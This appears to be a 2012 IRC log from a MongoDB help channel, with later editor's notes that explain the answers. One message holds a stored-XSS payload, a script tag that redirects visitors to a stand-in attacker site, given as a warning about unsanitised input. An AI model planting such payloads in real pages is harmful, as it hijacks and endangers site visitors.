[03:32:53] <arthurnn> i've got some questions about shard keys and queries on shard nodes
[03:33:59] <arthurnn> i work at 500px. we started using mongodb a few months ago to store all activities from the site. now we are wondering whether to start sharding this mongo instance that we have
[03:34:08] <arthurnn> but i need to know if this is the best option
[04:17:41] <jwilliams> what is the right way to continue on error if the driver is prior to e.g. 2.8.0?
[10:27:06] <NodeX> sanitising... it's very dangerous to let unsanitised code into any database
[10:27:33] <circlicious> what kind of sanitizing? i thought there's no sql injection thingie in mongo, so just storing whatever the user sent was fine in my case.
[10:28:25] <circlicious> basically, i am just allowing any user data for the "preferences" part of each record/document
[10:28:59] <circlicious> oh yeh, i didnt think of XSS, lol
[10:29:00] <NodeX> store <script>document.location.href='http://my.hacksite.com/exploitme.php'</script>
[10:29:20] <Guest45545> Hi guys. I have a quick question, I'm a newbie to mongo. When I use mongorestore on a set of bson files created by mongodump, where is the database restored to?
[10:29:21] <NodeX> when your user re-echoes what you saved they leave your site
[10:29:43] <NodeX> it's restored to the database it was dumped from
[10:40:27] <circlicious> ok done, things are better now NodeX
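[editor's note] The XSS point above comes down to escaping user-supplied data on output rather than trusting what was stored. A minimal sketch in Python, using NodeX's payload as the stored value; the variable names are illustrative:

```python
import html

# User-supplied preference value, stored verbatim in MongoDB.
stored = "<script>document.location.href='http://my.hacksite.com/exploitme.php'</script>"

# Escape on output so the browser renders it as text instead of executing it.
safe = html.escape(stored)
print(safe)
```

Storing the raw value is fine; the rule is that it must be escaped every time it is echoed back into a page.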
[10:43:15] <neil__g> Some advice, if anyone has a moment: I have a P-S-S replica set, and due to a runaway import all machines are now sitting at about 90% disk space. I've since deleted the big collection, but Mongo hasn't released the disk space. What's the safest way to free up that disk space? This is in production.
[10:43:54] <Guest45545> NodeX: can you just clarify this for me. If I run mongodump on my database, can I use mongorestore on the bson files on another server to recreate the database?
[10:55:42] <ankakusu> I have a problem while inserting a datetime object into mongodb.
[10:58:35] <ankakusu> as can be seen, I entered "2011-10-02T23:49:19Z"
[10:58:50] <circlicious> NodeX: say if you had a field called foo in your documents, that would sometimes have a value and sometimes would not have a value, what would you do when it would not have a value ?
[10:59:03] <circlicious> store foo: '' or do checking in PHP and not store anything for it ?
[10:59:22] <ankakusu> but I get "2011-10-02T20:49:19Z"
[10:59:38] <ankakusu> what is wrong about the code snippet?
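[editor's note] The three-hour shift above is almost certainly timezone conversion, not corruption: MongoDB stores datetimes as UTC, so a driver converts a local-time value before storing it. A sketch of the arithmetic, assuming the entered value was local time in a UTC+3 zone:

```python
from datetime import datetime, timezone, timedelta

# Hypothetical local zone: UTC+3 (consistent with the 3-hour shift observed).
local_tz = timezone(timedelta(hours=3))

# The value as entered, interpreted as local time.
entered = datetime(2011, 10, 2, 23, 49, 19, tzinfo=local_tz)

# MongoDB stores datetimes as UTC milliseconds, which is why the shell
# shows the same instant as 20:49:19Z.
as_stored = entered.astimezone(timezone.utc)
print(as_stored.isoformat())
```

So nothing is wrong with the stored instant; it is the same moment in time, displayed in UTC.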
[11:04:51] <NodeX> circlicious : it depends how your app wants to deal with it
[11:05:19] <circlicious> i guess if i add foo: '' that would end up consuming lots of megabytes with millions of documents
[11:05:28] <circlicious> so i'd better do the checking in php and not save it, should be fast
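[editor's note] Omitting an empty field rather than storing foo: '' is a common MongoDB pattern, since every stored key name costs space per document. A sketch of the idea (in Python rather than PHP; names are illustrative):

```python
def build_doc(base, foo=None):
    """Build the document, omitting 'foo' entirely when it has no value,
    instead of storing foo: '' on millions of documents."""
    doc = dict(base)
    if foo:  # only persist the field when it actually carries a value
        doc["foo"] = foo
    return doc

print(build_doc({"user": "circlicious"}))             # no 'foo' key at all
print(build_doc({"user": "circlicious"}, foo="bar"))  # foo stored

# Documents missing the field can still be matched later with:
#   db.coll.find({"foo": {"$exists": False}})
```

The $exists operator keeps the missing-field documents queryable, so nothing is lost by leaving the key out.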
[11:15:06] <pb8345> hi, does anyone have experience with oracle nosql?
[12:18:09] <jwilliams> stopping one process looks like it's making more progress.
[13:43:58] <addisonj> http://aws.typepad.com/aws/2012/08/fast-forward-provisioned-iops-ebs.html this is quite exciting, predictable performance from EBS? who woulda thought
[14:47:07] <NodeX> anyone know much about PCI compliance with MongoDB ?
[15:20:58] <BurtyB> Anyone know how I can prevent "PHP Fatal error: Uncaught exception 'MongoCursorException' with message 'too many attempts to update config, failing' in " I'm assuming it's because it's moving shards around?
[15:50:35] <cwebb_> i am running mongodump and its speed is very slow (4 hours for only 5% with total docs around 120mm). the previous run for another collection didn't take that long.
[15:51:29] <cwebb_> checking mongostat --discover, not many locked % (usually 0%, several times it may be around 10%).
[15:51:49] <cwebb_> iostat -x 1 shows that cpu is usually idle.
[15:52:05] <cwebb_> what other factors should i check, or where could i start?
[16:05:49] <kali> cwebb_: look for faults in mongostat rather than locks. locks are taken only on writes
[16:09:11] <cwebb_> kali: i just noticed there is a higher value (around 50~60) in the faults column. i guess that's because there is no index created (it was just for testing bulk writes, so the index will be created later)
[16:10:03] <nemothekid> Anyone here familiar with the mongodb perl driver? It doesn't seem to encode utf-8 strings properly
[16:10:04] <cwebb_> but another collection whose index was also not created did not take very long to dump around 60g of data to disk.
[16:10:41] <cwebb_> any way i can reduce the page faults? or improve this slowness issue?
[16:14:08] <cwebb_> kali: i wish i could have more ram : (
[16:14:27] <kali> is it 50/60 when mongodump is running ?
[16:15:06] <cwebb_> yes. turn off mongodump and the faults drop to 1 ~ 2.
[16:16:11] <scttnlsn> how can i atomically insert a document only if a collection is empty? is this possible with findAndModify?
[16:17:03] <addisonj> cwebb_: we had a weird issue like that, I think we ended up doing a compact and repair then all was okay
[16:18:06] <addisonj> scttnlsn: pretty sure thats a no, but I could be wrong...
[16:19:42] <cwebb_> when running compact, will it influence performance if no indexes exist?
[16:19:46] <scttnlsn> addisonj: ok, that's what i thought. i've tried all sorts of various things with findAndModify, none of which worked like i wanted
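[editor's note] findAndModify can't atomically test "collection is empty", but a common workaround gets the same effect: upsert against a fixed sentinel _id, so the insert happens only if no such document exists yet. A sketch using the modern pymongo `update_one` API; the function and `"singleton"` id are made-up names, and it only equals "insert if empty" when every writer goes through this path:

```python
def insert_if_absent(collection, payload):
    """Upsert on a fixed sentinel _id: the document is created only if no
    document with that _id exists yet.  The upsert itself is atomic on the
    server, so concurrent callers can't both insert."""
    result = collection.update_one(
        {"_id": "singleton"},
        {"$setOnInsert": payload},   # applied only when the upsert inserts
        upsert=True,
    )
    return result.upserted_id is not None  # True if we actually inserted
```

The first caller wins the insert; every later caller gets False back without modifying anything.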
[16:21:03] <lbjay> i'm trying to set up an init.d script for mongo on a centos system that runs it using the numactl command. anyone have any examples of this on centos?
[16:21:59] <lbjay> centos doesn't have a start-stop-daemon command, just a shell function called "daemon", so the examples i'm seeing don't work for me
[18:28:54] <SisterArrow> I have a 3 node replica set, and the primary went down, so a secondary took over and data was written to it as it was primary at this point. When i restarted the previous primary (which should be primary as well) it stays as primary and in the mongo log it says
[18:30:54] <Almindor> we had a repl error (disk overuse) and we want to move a replicaset to another drive (on linux). I have started re-syncing the slave, but it's not even half-done and we can already put the new drives into the machine. Is it possible to copy the data of the slave so it continues syncing from where it stopped?
[18:31:20] <Almindor> note that I will mount the new drive in a way which is transparent for mongo
[18:31:34] <kali> Almindor: i think it will start all over again
[18:32:20] <Almindor> kali: so if you start a full re-sync, stop mongod for it and restart it deletes all data and resyncs again?
[18:34:00] <kali> i think this is what it will do, yeah
[19:08:21] <boll> it's not like I am clobbering the server though
[19:14:16] <TheSteve0> alright I am working in Python and I want to convert my results from BSON to just JSON - I have spent a couple hours searching around and trying different solutions and I can't get it to work
[19:28:39] <TkTech> find() just returns an iterable cursor that you must traverse, .find_one() returns a dict. json.dumps() takes a dict.
[19:29:44] <TheSteve0> TkTech: yup beginner to Python
[19:30:11] <TheSteve0> aahhh I was feeding JSON dump the list
[19:30:13] <dstorrs> I've got a harvester which pulls data from YouTube and inserts it to Mongo. When it first starts, I get excellent insert rates -- 1000+ w/s. Within a few minutes, it drops to ~700 w/s. Then 300. Then 100. Then a few dozen.
[19:30:38] <dstorrs> I've been through my code and I don't see anything to cause this...is there anything on the Mongo side that is a likely culprit?
[19:30:56] <dstorrs> It's 9 machines, each with multiple copies of the harvester proc running in parallel.
[19:31:47] <dstorrs> any ideas at all are much appreciated, because I'm kinda at wits end.
[19:32:59] <dstorrs> oh, and it's a sharded DB if that matters
[19:33:15] <TheSteve0> TkTech: well that is inconvenient - I was hoping I could just "automagically" give the list to a converter and get back nice clean JSON
[19:33:41] <TkTech> I'm confused as to why this is confusing.
[19:33:51] <TkTech> And why you keep describing it as "nice clean JSON"
[19:34:10] <dstorrs> TheSteve0: I didn't see the beginning of your convo, but you can probably do this: db.coll.find(..).forEach(function(d){ printjson(d) })
[19:38:06] <TheSteve0> TkTech: I understand it is not technically
[19:38:12] <TkTech> No, not technically nor really.
[19:38:35] <TkTech> If you want JSON, import json and turn it into JSON.
[19:39:27] <TheSteve0> TkTech: if I got rid of the u before each string, the string I get back from str(list(find)) is a JSON string - especially since I have no dates in my documents
[19:40:18] <TkTech> A poor orphanage burns down every single time you say that.
[19:40:26] <TkTech> Why are you against doing this properly in two lines?
[19:40:47] <TkTech> Do not treat a python dict, which is a python dict, as g'damn JSON.
[19:40:52] <TheSteve0> TkTech: I am not - which is why I said let me go do what you said
[19:41:15] <TheSteve0> TkTech: I was laughing at your orphanage statement
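[editor's note] TkTech's "two lines" boils down to json.dumps() on the dict the driver returns, with a fallback for types JSON can't encode (ObjectId, datetime). A sketch on a stand-in dict, since find_one() needs a live server; the field names and hex id are made up:

```python
import json
from datetime import datetime

# A dict shaped like what collection.find_one() returns.  The u'' prefixes
# TheSteve0 saw are just Python's unicode repr, not part of the data.
doc = {
    "_id": "5023c5a1e4b05523d41a8cb2",   # a real driver returns an ObjectId here
    "name": "steve",
    "created": datetime(2012, 8, 9, 19, 30),
}

# json.dumps() handles dicts natively; default=str covers anything JSON has
# no encoding for.  For a find() cursor, wrap it in list(cursor) first.
print(json.dumps(doc, default=str))
```

str(list(find)) only happens to look like JSON; json.dumps() produces the real thing (double quotes, no u prefixes, valid escapes).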
[19:55:43] <nemothekid> So we have about 13 million records in a sharded collection to be updated daily in about 4 hours. We've found that the fastest way to do this is to just create a temporary table, do the inserts, then rename & drop. Sadly, you can't rename a sharded collection. Obviously our next step was to try removes and inserts, or just updates. This is _much_ slower. Are there any other options?
[20:09:33] <TheSteve0> TkTech: Booya cashah - it works
[20:09:38] <TheSteve0> TkTech: thanks for your patience
[20:10:05] <TheSteve0> TkTech: any ideas on where I would put this so some other poor newb like me can find it all collected in one place
[20:10:14] <TheSteve0> TkTech: I mean in terms of doc
[20:10:36] <boll> On a not very heavily loaded sharded database, are there any obvious reasons that a backlog of 2000 or more write operations would sit in the operations queue (db.currentOp())?
[20:14:23] <EricL> Does adding a replicaset to a sharded environment (ie the shard) distribute reads?
[20:22:08] <jgornick> Hey guys, does anyone have any insight into how I can write a map/reduce to produce a list of documents that are in a hierarchical tree structure using the child links method? I need to produce a list where I know the ID of a single document and I need to capture all of its children as well.
[20:26:48] <boll> In a replica set, is there a downside to allowing slave reads?
[20:26:51] <crudson> jgornick: Sounds perfectly reasonable. Do you have example input documents?
[20:27:24] <nofxx> boll, data may take some time to replicate, but it's meant to be used like that
[20:27:59] <nofxx> if you don't read from the slaves you got yourself some expensive backup machine
[20:28:21] <jgornick> crudson: I suppose you could look at the sample for child links @ http://www.mongodb.org/display/DOCS/Trees+in+MongoDB#TreesinMongoDB-ChildLinks
[20:28:58] <nofxx> boll, you can use consistency: :strong on a per-connection basis, check your driver
[20:29:04] <jgornick> crudson: Actually, I should get something more concrete to my example.
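[editor's note] For the child-links question above, map/reduce is an awkward fit; the usual approach is an iterative traversal that fetches each level of children. A sketch of the walk itself, using a dict as a stand-in for the collection (the doc shape follows the child-links pattern from the linked docs page; names are illustrative):

```python
from collections import deque

def collect_descendants(docs_by_id, root_id):
    """Walk a child-links tree breadth-first, returning the root document
    and every descendant.  docs_by_id stands in for the collection; with a
    real driver you'd fetch each level with find({"_id": {"$in": ids}})."""
    seen, queue, out = {root_id}, deque([root_id]), []
    while queue:
        doc = docs_by_id[queue.popleft()]
        out.append(doc)
        for child in doc.get("children", []):
            if child not in seen:        # guard against cycles / bad links
                seen.add(child)
                queue.append(child)
    return out
```

Batching each level through $in keeps the number of round trips proportional to the tree's depth rather than its size.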
[20:29:08] <boll> nofxx: I don't read from the secondary, but it's incredibly handy for robustness and upgrades
[21:07:44] <acidchild> Hello, i added a shard that contains the entire database but i added it as localhost not the IP. how do i change the shard hostname/ip without draining it? because it contains all the data and it's failing to move chunks to the other shard because it's 'localhost' not the IP?
[21:08:00] <acidchild> these are the errors i am getting; http://pastebin.slackadelic.com/p/Ze7Ox045.html
[21:11:40] <emperorcezar> So I'm using mongodb as an mq backend for celery. The program using celery is migrating email. So it's pushing messages into a queue stored on mongo and then pulling them off and pushing them somewhere else. From my understanding, mongo will just keep growing the db file until I do a repair? My mail size is 2.5 terabytes. So I'm concerned about the db becoming huge without repair.
[21:17:17] <emperorcezar> This thing better scale off the bat. There's no light usage. Soon as I turn it on, it's going to hammer.
[21:45:53] <nofxxx> Just to make sure I got it right: repairDatabase(), on new versions, will only release free space to the system, so it's no longer needed to run it on a schedule
[22:13:19] <kingsol> hey all… new to mongodb (literally today) - I've followed the guide in the docs, and have searched google to find my issue to no avail. It is permission related for sure. I am on fedora. I can run "mongod" as root and it fires up. If i run "service mongod start" I get a fail, says it can't write to the log. I've found posts with similar problems… I've checked the permissions for /var/log, /var/log/mongo/ and the file itself, I've done this f
[22:13:19] <kingsol> /data/db/ as well… at a dead end as I am not a permissions wizard.
[22:18:35] <kingsol> already working … starting now...
[22:20:01] <kingsol> jY: so does that mean I need to permanently disable selinux? to be honest, I am not intimate with benefit/issues with selinux other then some high level details
[22:20:36] <jY> or figure out how to tell selinux writing to those logs and binding to that port is ok for the mongo user
[22:21:47] <kingsol> is selinux a "strong benefit" or a "nice-to-have" or is it relative to function/role of the machine
[22:22:34] <jY> depends on your stance on security i guess
[22:22:55] <jY> it makes things like buffer overflows pretty much impossible
[22:23:41] <kingsol> ok… thank you so much… I'll see if I can figure out how to tell selinux to allow mongos user for those files/folders
[22:24:07] <arthurnn> anyone in there. willing to help me out.
[22:25:07] <arthurnn> i had a collection in one mongod server only.. i added it to a shard cluster.. and I set the shard key to a property that is not unique.
[22:29:55] <arthurnn> because i started sharding a pre existent collection that i had.
[22:30:12] <arthurnn> and it looks like .count() is getting smaller and smaller. any reason for it?
[22:32:22] <kingsol> jY: ok, checked the logs… looks like another perm issue I can track down on google "Unable to acquire lock for lockfilepath: /var/lib/mongo/mongod.lock" checking google
[22:36:45] <arthurnn> if I do a stats() on my collection, it looks like the count on shard0000 is decreasing but the count on shard0001 is not increasing
[22:57:45] <kingsol> jY: still won't start, fixed the locking issue by simply removing the file and letting it be created again… now it is failing because it says the port is in use
[23:01:54] <kingsol> jY: interesting… so it is actually starting just fine now; the service start is hanging - it seems it's not getting a success message from mongod starting… if i tail -f the log, start with "service mongod start &", then run mongo, I can connect. If i let it sit long enough the process for the service start terminates with a fail
[23:23:04] <kingsol> jY: I gotta run… I appreciate your help!